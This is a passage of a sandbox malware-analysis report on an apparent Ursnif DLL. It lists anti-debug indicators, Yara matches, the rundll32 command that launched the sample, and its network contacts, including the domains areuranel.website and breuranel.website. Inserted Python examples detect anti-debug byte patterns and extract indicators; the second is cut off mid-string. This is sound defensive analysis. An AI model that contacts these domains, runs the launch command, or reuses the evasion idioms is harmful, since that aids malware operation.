                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3EC72 push D5DD2AEAh; iretd
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AEC72 push D5DD2AEAh; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E90AB9A push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: Yara match File source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara match File source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000018.00000002.553524158.0000000004891000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWP
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.541015107.0000000004C87000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWen-USn7
                      Source: WerFault.exe, 00000012.00000002.531217612.0000000005260000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWH
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E92C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E938861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
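The PEB reads (`mov eax, dword ptr fs:[00000030h]`, `push dword ptr fs:[00000030h]`), the `DebugPort` queries and the `push ecx; ret` stubs listed above are the anti-debug and control-flow obfuscation idioms the sandbox flagged. As an added example, not part of this report or of the analysed sample, the following Python scans a 32-bit x86 code buffer for the byte encodings of those instructions and, for each PEB read, looks a few bytes ahead for the `BeingDebugged` (PEB+0x02) or `NtGlobalFlag` (PEB+0x68) access that turns a harmless PEB read into a debugger check. The sample buffer is hand-assembled for the demonstration, not bytes from 616412739e268.dll; the 16-byte look-ahead window and the follow-up table are assumptions. The caveat a practitioner wants: bare PEB reads and push/ret pairs are also emitted by ordinary compiler runtime code, so a hit on its own is weak evidence and is only meaningful alongside the `DebugPort` queries and Yara matches the report pairs it with.

```python
"""Static check for the x86 anti-debug / obfuscation idioms a sandbox flags."""

# 32-bit x86 encodings of the PEB reads listed in the report.
PEB_READS = {
    b"\x64\xA1\x30\x00\x00\x00":     "mov eax, dword ptr fs:[00000030h]",
    b"\x64\xFF\x35\x30\x00\x00\x00": "push dword ptr fs:[00000030h]",
}
# Accesses that commonly follow a PEB read when it is a debugger check
# (assumed table; extend with other PEB offsets as needed).
PEB_FOLLOWUPS = {
    b"\x0F\xB6\x40\x02": "movzx eax, byte ptr [eax+2]  ; PEB.BeingDebugged",
    b"\x0F\xB6\x48\x02": "movzx ecx, byte ptr [eax+2]  ; PEB.BeingDebugged",
    b"\x80\x78\x02\x00": "cmp byte ptr [eax+2], 0      ; PEB.BeingDebugged",
    b"\x8B\x40\x68":     "mov eax, dword ptr [eax+68h] ; PEB.NtGlobalFlag",
}
PUSH_RET = b"\x51\xC3"  # push ecx; ret (call/push/ret control-flow obfuscation)


def _find_all(buf, pat):
    """Yield every offset at which pat occurs in buf (overlaps included)."""
    i = buf.find(pat)
    while i != -1:
        yield i
        i = buf.find(pat, i + 1)


def scan(buf, base=0, window=16):
    """Return (address, instruction, follow-up or None) for every hit, sorted."""
    hits = []
    for pat, text in PEB_READS.items():
        for off in _find_all(buf, pat):
            tail = buf[off + len(pat): off + len(pat) + window]
            follow = next((t for p, t in PEB_FOLLOWUPS.items() if p in tail), None)
            hits.append((base + off, text, follow))
    for off in _find_all(buf, PUSH_RET):
        hits.append((base + off, "push ecx; ret", None))
    return sorted(hits, key=lambda h: h[0])


def verdict(hits):
    """'anti-debug' when a PEB read is followed by a BeingDebugged/NtGlobalFlag
    access, 'peb-read' for bare PEB reads (common in CRT code), else 'clean'."""
    if any(h[2] for h in hits):
        return "anti-debug"
    if any(h[1].endswith("fs:[00000030h]") for h in hits):
        return "peb-read"
    return "clean"


# Constructed sample: hand-assembled bytes, not taken from the analysed DLL.
SAMPLE = (
    b"\x55\x8B\xEC"                  # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, dword ptr fs:[30h]
    b"\x0F\xB6\x40\x02"              # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    b"\x85\xC0\x74\x05"              # test eax, eax; jz +5
    b"\x90\x90\x90\x90\x90"          # nop x5
    b"\x64\xFF\x35\x30\x00\x00\x00"  # push dword ptr fs:[30h]
    b"\x58"                          # pop eax
    b"\x8B\x40\x68"                  # mov eax, dword ptr [eax+68h] (NtGlobalFlag)
    b"\x5D"                          # pop ebp
    b"\x51\xC3"                      # push ecx; ret
)

if __name__ == "__main__":
    for addr, text, follow in scan(SAMPLE, base=0x6E97DF00):
        print(f"{addr:08X}  {text}" + (f"  ->  {follow}" if follow else ""))
    print("verdict:", verdict(scan(SAMPLE)))
```

The same byte strings translate directly into a Yara hex string; the follow-up check is what keeps the rule from firing on every CRT function that happens to touch the PEB.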

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.98.207.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
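A rundll32.exe that resolves names and opens connections is the point of this signature: the host process has no business on the network, so whatever it contacted is attributable to the injected code. As an added example, not part of this report, the following Python turns the rows above into per-process indicators, separates the Microsoft-owned domains from the rest, and defangs the result for sharing. The allowlist of Microsoft suffixes is a triage assumption, not a classification the report makes (the report only records that these names were queried); the trailing number on the `Network Connect` rows is carried through without being interpreted, and the row text is reproduced from this section rather than read from a report export.

```python
"""Extract and triage network IOCs from sandbox 'Domain query' / 'Network Connect' rows."""
import ipaddress
import re
from collections import defaultdict

# Rows copied from the signature above (constructed input, not a report export).
REPORT_ROWS = r"""
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.98.207.210 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.60.226 187
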